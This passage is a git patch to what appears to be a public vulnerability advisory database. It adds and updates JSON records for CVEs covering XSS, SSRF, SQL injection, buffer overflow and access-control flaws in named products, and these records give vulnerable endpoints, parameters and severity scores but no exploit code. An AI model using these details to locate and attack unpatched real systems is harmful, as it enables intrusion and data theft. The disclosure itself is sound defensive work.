+1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2fpq-m96x-2xgf", - "modified": "2026-02-05T00:31:01Z", + "modified": "2026-02-23T12:31:29Z", "published": "2026-02-05T00:31:01Z", "aliases": [ "CVE-2026-1895" @@ -46,6 +46,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.742666" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.742679" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-2ww6-c8hm-gqw6/GHSA-2ww6-c8hm-gqw6.json b/advisories/unreviewed/2026/02/GHSA-2ww6-c8hm-gqw6/GHSA-2ww6-c8hm-gqw6.json new file mode 100644 index 0000000000000..95e4aa8f89ca3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2ww6-c8hm-gqw6/GHSA-2ww6-c8hm-gqw6.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2ww6-c8hm-gqw6", + "modified": "2026-02-23T12:31:29Z", + "published": "2026-02-23T12:31:29Z", + "aliases": [ + "CVE-2025-40701" + ], + "details": "Reflected Cross-Site Scripting vulnerability in SOTESHOP, version 8.3.4. THis vulnerability allows an attacker execute JavaScript code in the victim's browser when a malicious URL with the 'id' parameter in '/adsTracker/checkAds' is sent to the victim. The vulnerability can be exploited to steal sensitive user information such as session cookies, or to perform actions on their behalf.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40701" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-xss-sotes-soteshop" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T11:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3mqj-x3cm-3wgr/GHSA-3mqj-x3cm-3wgr.json b/advisories/unreviewed/2026/02/GHSA-3mqj-x3cm-3wgr/GHSA-3mqj-x3cm-3wgr.json new file mode 100644 index 0000000000000..9c29f858f60b1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3mqj-x3cm-3wgr/GHSA-3mqj-x3cm-3wgr.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3mqj-x3cm-3wgr", + "modified": "2026-02-23T12:31:30Z", + "published": "2026-02-23T12:31:30Z", + "aliases": [ + "CVE-2026-2985" + ], + "details": "A security flaw has been discovered in Tiandy Video Surveillance System 视频监控平台 7.17.0. This impacts the function downloadImage of the file /com/tiandy/easy7/core/bo/CLSBODownLoad.java. Performing a manipulation of the argument urlPath results in server-side request forgery. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2985" + }, + { + "type": "WEB", + "url": "https://my.feishu.cn/wiki/C1TIwBoJziINWlkGt8ucnZJPnEb?from=from_copylink" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347368" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347368" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756137" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T11:16:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-429q-mrc4-38fr/GHSA-429q-mrc4-38fr.json b/advisories/unreviewed/2026/02/GHSA-429q-mrc4-38fr/GHSA-429q-mrc4-38fr.json index 74426455a29ad..332d8539a73ad 100644 --- a/advisories/unreviewed/2026/02/GHSA-429q-mrc4-38fr/GHSA-429q-mrc4-38fr.json +++ b/advisories/unreviewed/2026/02/GHSA-429q-mrc4-38fr/GHSA-429q-mrc4-38fr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-429q-mrc4-38fr", - "modified": "2026-02-23T09:31:23Z", + "modified": "2026-02-23T12:31:29Z", "published": "2026-02-23T09:31:23Z", "aliases": [ "CVE-2026-25747" @@ -21,6 +21,10 @@ { "type": "WEB", "url": "https://github.com/oscerd/CVE-2026-25747" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2026/02/18/6" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-4x58-j42h-46c2/GHSA-4x58-j42h-46c2.json b/advisories/unreviewed/2026/02/GHSA-4x58-j42h-46c2/GHSA-4x58-j42h-46c2.json new file mode 100644 index 0000000000000..8a854b647386a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4x58-j42h-46c2/GHSA-4x58-j42h-46c2.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4x58-j42h-46c2", + "modified": "2026-02-23T12:31:29Z", + "published": "2026-02-23T12:31:29Z", + "aliases": [ + "CVE-2025-40986" + ], + "details": "Reflected Cross-Site Scripting (XSS) vulnerability in PideTuCita. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by sending him/her a malicious URL using the endpoint 'cookies/indes.php/'. This vulnerability can be exploited to steal confidential user data, such as session cookies or to perform actions on behalf of the user.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40986" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-pidetucita" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T11:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json b/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json index 93f7774cb35fb..aff0817b94c65 100644 --- a/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json +++ b/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c3f3-cc42-xr9v", - "modified": "2026-02-23T09:31:23Z", + "modified": "2026-02-23T12:31:29Z", "published": "2026-02-23T09:31:23Z", "aliases": [ "CVE-2026-23552" @@ -21,6 +21,10 @@ { "type": "WEB", "url": "https://github.com/oscerd/CVE-2026-23552" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2026/02/18/7" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-c6rr-xhrp-94pr/GHSA-c6rr-xhrp-94pr.json b/advisories/unreviewed/2026/02/GHSA-c6rr-xhrp-94pr/GHSA-c6rr-xhrp-94pr.json index 36370774fcc0f..9be451fc72c07 100644 --- a/advisories/unreviewed/2026/02/GHSA-c6rr-xhrp-94pr/GHSA-c6rr-xhrp-94pr.json +++ b/advisories/unreviewed/2026/02/GHSA-c6rr-xhrp-94pr/GHSA-c6rr-xhrp-94pr.json @@ -42,6 +42,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-266", "CWE-269" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2026/02/GHSA-gj3h-r32m-qjhw/GHSA-gj3h-r32m-qjhw.json b/advisories/unreviewed/2026/02/GHSA-gj3h-r32m-qjhw/GHSA-gj3h-r32m-qjhw.json index ca3bd2d942b8d..955a8fc65ec6f 100644 --- a/advisories/unreviewed/2026/02/GHSA-gj3h-r32m-qjhw/GHSA-gj3h-r32m-qjhw.json +++ b/advisories/unreviewed/2026/02/GHSA-gj3h-r32m-qjhw/GHSA-gj3h-r32m-qjhw.json @@ -42,6 +42,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-266", "CWE-269" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2026/02/GHSA-hhvh-4rv2-p55m/GHSA-hhvh-4rv2-p55m.json b/advisories/unreviewed/2026/02/GHSA-hhvh-4rv2-p55m/GHSA-hhvh-4rv2-p55m.json new file mode 100644 index 0000000000000..4ae63261605ad --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hhvh-4rv2-p55m/GHSA-hhvh-4rv2-p55m.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hhvh-4rv2-p55m", + "modified": "2026-02-23T12:31:30Z", + "published": "2026-02-23T12:31:29Z", + "aliases": [ + "CVE-2025-59873" + ], + "details": "An information exposure vulnerability exists in\n\nVulnerability in HCL Software ZIE for Web.\n\nThe application transmits sensitive session tokens and authentication identifiers within the URL query parameters . An attacker who gains access to any network log or operates a site linked from the application can hijack user sessions\n\nThis issue affects ZIE for Web: v16.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59873" + }, + { + "type": "WEB", + "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128902" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T11:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jm4f-crxv-97j5/GHSA-jm4f-crxv-97j5.json b/advisories/unreviewed/2026/02/GHSA-jm4f-crxv-97j5/GHSA-jm4f-crxv-97j5.json index 806e247c033b8..f18da5530a5d0 100644 --- a/advisories/unreviewed/2026/02/GHSA-jm4f-crxv-97j5/GHSA-jm4f-crxv-97j5.json +++ b/advisories/unreviewed/2026/02/GHSA-jm4f-crxv-97j5/GHSA-jm4f-crxv-97j5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jm4f-crxv-97j5", - "modified": "2026-02-08T21:30:17Z", + "modified": "2026-02-23T12:31:29Z", "published": "2026-02-08T21:30:17Z", "aliases": [ "CVE-2026-2171" @@ -38,6 +38,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.749233" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754641" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-m8cf-3mc4-cgqh/GHSA-m8cf-3mc4-cgqh.json b/advisories/unreviewed/2026/02/GHSA-m8cf-3mc4-cgqh/GHSA-m8cf-3mc4-cgqh.json new file mode 100644 index 0000000000000..4626f2917cbfe --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m8cf-3mc4-cgqh/GHSA-m8cf-3mc4-cgqh.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m8cf-3mc4-cgqh", + "modified": "2026-02-23T12:31:30Z", + "published": "2026-02-23T12:31:30Z", + "aliases": [ + "CVE-2026-2983" + ], + "details": "A vulnerability was determined in SourceCodester Student Result Management System 1.0. The impacted element is an unknown function of the file /admin/core/import_users.php of the component Bulk Import. This manipulation of the argument File causes improper access controls. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2983" + }, + { + "type": "WEB", + "url": "https://github.com/Shaon-Xis/SRMS-1.0---Unauthenticated-SMTP-Hijacking-to-Account-Takeover#-vulnerability-2-unauthenticated-bulk-account-injection-arbitrary-file-upload" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347366" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347366" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756135" + }, + { + "type": "WEB", + "url": "https://www.sourcecodester.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T10:16:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qpc6-m6hf-x62g/GHSA-qpc6-m6hf-x62g.json b/advisories/unreviewed/2026/02/GHSA-qpc6-m6hf-x62g/GHSA-qpc6-m6hf-x62g.json index 32a00258c2093..e530f14cadcf6 100644 --- a/advisories/unreviewed/2026/02/GHSA-qpc6-m6hf-x62g/GHSA-qpc6-m6hf-x62g.json +++ b/advisories/unreviewed/2026/02/GHSA-qpc6-m6hf-x62g/GHSA-qpc6-m6hf-x62g.json @@ -46,6 +46,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-266", "CWE-269" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2026/02/GHSA-vwfg-jcqm-ff7v/GHSA-vwfg-jcqm-ff7v.json b/advisories/unreviewed/2026/02/GHSA-vwfg-jcqm-ff7v/GHSA-vwfg-jcqm-ff7v.json index c167ddd1325b3..e46de3eb0692f 100644 --- a/advisories/unreviewed/2026/02/GHSA-vwfg-jcqm-ff7v/GHSA-vwfg-jcqm-ff7v.json +++ b/advisories/unreviewed/2026/02/GHSA-vwfg-jcqm-ff7v/GHSA-vwfg-jcqm-ff7v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vwfg-jcqm-ff7v", - "modified": "2026-02-09T09:30:22Z", + "modified": "2026-02-23T12:31:29Z", "published": "2026-02-09T09:30:22Z", "aliases": [ "CVE-2026-2225" @@ -42,6 +42,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.753402" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754405" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-wcvw-rr7p-mw54/GHSA-wcvw-rr7p-mw54.json b/advisories/unreviewed/2026/02/GHSA-wcvw-rr7p-mw54/GHSA-wcvw-rr7p-mw54.json new file mode 100644 index 0000000000000..827a12e8ac128 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wcvw-rr7p-mw54/GHSA-wcvw-rr7p-mw54.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wcvw-rr7p-mw54", + "modified": "2026-02-23T12:31:30Z", + "published": "2026-02-23T12:31:30Z", + "aliases": [ + "CVE-2026-2984" + ], + "details": "A vulnerability was identified in SourceCodester Student Result Management System 1.0. This affects an unknown function of the file /admin/core/drop_user.php. Such manipulation of the argument ID leads to denial of service. The attack can be executed remotely. The exploit is publicly available and might be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2984" + }, + { + "type": "WEB", + "url": "https://github.com/Shaon-Xis/SRMS-1.0---Unauthenticated-SMTP-Hijacking-to-Account-Takeover#vulnerability-3-unauthenticated-arbitrary-account-deletion-dos" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347367" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347367" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756136" + }, + { + "type": "WEB", + "url": "https://www.sourcecodester.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T11:16:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xm94-xrhg-42m4/GHSA-xm94-xrhg-42m4.json b/advisories/unreviewed/2026/02/GHSA-xm94-xrhg-42m4/GHSA-xm94-xrhg-42m4.json new file mode 100644 index 0000000000000..67bedf7f53130 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xm94-xrhg-42m4/GHSA-xm94-xrhg-42m4.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xm94-xrhg-42m4", + "modified": "2026-02-23T12:31:29Z", + "published": "2026-02-23T12:31:29Z", + "aliases": [ + "CVE-2025-41002" + ], + "details": "SQL injection vulnerability in Infoticketing. This vulnerability allows\n an unauthenticated attacker to retrieve, create, update, and delete the\n database by sending a POST request using the 'code' parameter in '/components/cart/cartApplyDiscount.php'.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41002" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/sql-injection-infoticketing" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T10:16:17Z" + } +} \ No newline at end of file From d56d988100c120508b7f9912deeab91c936d3de3 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 15:32:38 +0000 Subject: [PATCH 53/77] Publish Advisories GHSA-62m6-f67r-3r6p GHSA-m4cp-qj9v-7wpc GHSA-hm8v-8c3v-cxfq GHSA-25cv-hf25-fqf8 GHSA-438c-878c-qvmf GHSA-4h76-926q-wxxw GHSA-c85p-r6x8-fqgr GHSA-cqp7-wf4c-3xgc GHSA-g666-g65w-p8mh GHSA-jxwm-5mrm-6h8j GHSA-mc6c-v4m2-858f GHSA-rq7m-qrq2-mrg5 GHSA-ww95-r66q-v2hh --- .../GHSA-62m6-f67r-3r6p.json | 6 +++- .../GHSA-m4cp-qj9v-7wpc.json | 6 +++- .../GHSA-hm8v-8c3v-cxfq.json | 6 +++- .../GHSA-25cv-hf25-fqf8.json | 15 +++++--- .../GHSA-438c-878c-qvmf.json | 29 +++++++++++++++ .../GHSA-4h76-926q-wxxw.json | 4 ++- .../GHSA-c85p-r6x8-fqgr.json | 36 +++++++++++++++++++ .../GHSA-cqp7-wf4c-3xgc.json | 4 ++- .../GHSA-g666-g65w-p8mh.json | 6 +++- .../GHSA-jxwm-5mrm-6h8j.json | 15 +++++--- .../GHSA-mc6c-v4m2-858f.json | 15 +++++--- .../GHSA-rq7m-qrq2-mrg5.json | 36 +++++++++++++++++++ .../GHSA-ww95-r66q-v2hh.json | 15 +++++--- 13 files changed, 171 insertions(+), 22 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-438c-878c-qvmf/GHSA-438c-878c-qvmf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c85p-r6x8-fqgr/GHSA-c85p-r6x8-fqgr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rq7m-qrq2-mrg5/GHSA-rq7m-qrq2-mrg5.json diff --git a/advisories/unreviewed/2025/02/GHSA-62m6-f67r-3r6p/GHSA-62m6-f67r-3r6p.json b/advisories/unreviewed/2025/02/GHSA-62m6-f67r-3r6p/GHSA-62m6-f67r-3r6p.json index 8f27bd27b0f16..76a3df765a22a 100644 --- a/advisories/unreviewed/2025/02/GHSA-62m6-f67r-3r6p/GHSA-62m6-f67r-3r6p.json +++ b/advisories/unreviewed/2025/02/GHSA-62m6-f67r-3r6p/GHSA-62m6-f67r-3r6p.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-62m6-f67r-3r6p", - "modified": "2025-02-15T00:32:47Z", + "modified": "2026-02-23T15:31:14Z", "published": "2025-02-15T00:32:47Z", "aliases": [ "CVE-2024-5462" ], "details": "If Brocade Fabric OS before Fabric OS 9.2.0 configuration settings are not set to encrypt SNMP passwords, then the SNMP privsecret / authsecret fields can be exposed in plaintext. The plaintext passwords can be exposed in a configupload capture or a supportsave capture if encryption of passwords is not enabled. An attacker can use these passwords to fetch values of the supported OIDs via SNMPv3 queries. There are also a limited number of MIB objects that can be modified.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/02/GHSA-m4cp-qj9v-7wpc/GHSA-m4cp-qj9v-7wpc.json b/advisories/unreviewed/2025/02/GHSA-m4cp-qj9v-7wpc/GHSA-m4cp-qj9v-7wpc.json index 9bad0bf22315e..99fee228f76c1 100644 --- a/advisories/unreviewed/2025/02/GHSA-m4cp-qj9v-7wpc/GHSA-m4cp-qj9v-7wpc.json +++ b/advisories/unreviewed/2025/02/GHSA-m4cp-qj9v-7wpc/GHSA-m4cp-qj9v-7wpc.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-m4cp-qj9v-7wpc", - "modified": "2025-02-15T00:32:47Z", + "modified": "2026-02-23T15:31:13Z", "published": "2025-02-15T00:32:47Z", "aliases": [ "CVE-2024-5461" ], "details": "Implementation of the Simple Network \nManagement Protocol (SNMP) operating on the Brocade 6547 (FC5022) \nembedded switch blade, makes internal script calls to system.sh from \nwithin the SNMP binary. An authenticated attacker could perform command \nor parameter injection on SNMP operations that are only enabled on the \nBrocade 6547 (FC5022) embedded switch. This injection could allow the \nauthenticated attacker to issue commands as Root.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/10/GHSA-hm8v-8c3v-cxfq/GHSA-hm8v-8c3v-cxfq.json b/advisories/unreviewed/2025/10/GHSA-hm8v-8c3v-cxfq/GHSA-hm8v-8c3v-cxfq.json index b1c252820a31e..52b84781bac69 100644 --- a/advisories/unreviewed/2025/10/GHSA-hm8v-8c3v-cxfq/GHSA-hm8v-8c3v-cxfq.json +++ b/advisories/unreviewed/2025/10/GHSA-hm8v-8c3v-cxfq/GHSA-hm8v-8c3v-cxfq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hm8v-8c3v-cxfq", - "modified": "2026-02-05T21:32:35Z", + "modified": "2026-02-23T15:31:14Z", "published": "2025-10-03T12:33:14Z", "aliases": [ "CVE-2025-11234" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:1831" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:3077" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2025-11234" diff --git a/advisories/unreviewed/2026/02/GHSA-25cv-hf25-fqf8/GHSA-25cv-hf25-fqf8.json b/advisories/unreviewed/2026/02/GHSA-25cv-hf25-fqf8/GHSA-25cv-hf25-fqf8.json index 506f73181951a..2202673b7ccea 100644 --- a/advisories/unreviewed/2026/02/GHSA-25cv-hf25-fqf8/GHSA-25cv-hf25-fqf8.json +++ b/advisories/unreviewed/2026/02/GHSA-25cv-hf25-fqf8/GHSA-25cv-hf25-fqf8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-25cv-hf25-fqf8", - "modified": "2026-02-19T18:31:54Z", + "modified": "2026-02-23T15:31:14Z", "published": "2026-02-19T18:31:54Z", "aliases": [ "CVE-2025-69674" ], "details": "Buffer Overflow vulnerability in CDATA FD614GS3-R850 V3.2.7_P161006 (Build.0333.250211) allows an attacker to execute arbitrary code via the node_mac, node_opt, opt_param, and domainblk parameters of the mesh_node_config and domiainblk_config modules", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-120" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T17:24:39Z" diff --git a/advisories/unreviewed/2026/02/GHSA-438c-878c-qvmf/GHSA-438c-878c-qvmf.json b/advisories/unreviewed/2026/02/GHSA-438c-878c-qvmf/GHSA-438c-878c-qvmf.json new file mode 100644 index 0000000000000..22520aafcf059 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-438c-878c-qvmf/GHSA-438c-878c-qvmf.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-438c-878c-qvmf", + "modified": "2026-02-23T15:31:15Z", + "published": "2026-02-23T15:31:15Z", + "aliases": [ + "CVE-2025-69700" + ], + "details": "Tenda FH1203 V2.0.1.6 contains a stack-based buffer overflow vulnerability in the modify_add_client_prio function, which is reachable via the formSetClientPrio CGI handler.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69700" + }, + { + "type": "WEB", + "url": "https://github.com/xhh0124/SemVulLLM" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T14:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4h76-926q-wxxw/GHSA-4h76-926q-wxxw.json b/advisories/unreviewed/2026/02/GHSA-4h76-926q-wxxw/GHSA-4h76-926q-wxxw.json index 0ec7033b69ac3..1858ccf6ca023 100644 --- a/advisories/unreviewed/2026/02/GHSA-4h76-926q-wxxw/GHSA-4h76-926q-wxxw.json +++ b/advisories/unreviewed/2026/02/GHSA-4h76-926q-wxxw/GHSA-4h76-926q-wxxw.json @@ -29,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-601" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-c85p-r6x8-fqgr/GHSA-c85p-r6x8-fqgr.json b/advisories/unreviewed/2026/02/GHSA-c85p-r6x8-fqgr/GHSA-c85p-r6x8-fqgr.json new file mode 100644 index 0000000000000..daa4f02f7935f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c85p-r6x8-fqgr/GHSA-c85p-r6x8-fqgr.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c85p-r6x8-fqgr", + "modified": "2026-02-23T15:31:15Z", + "published": 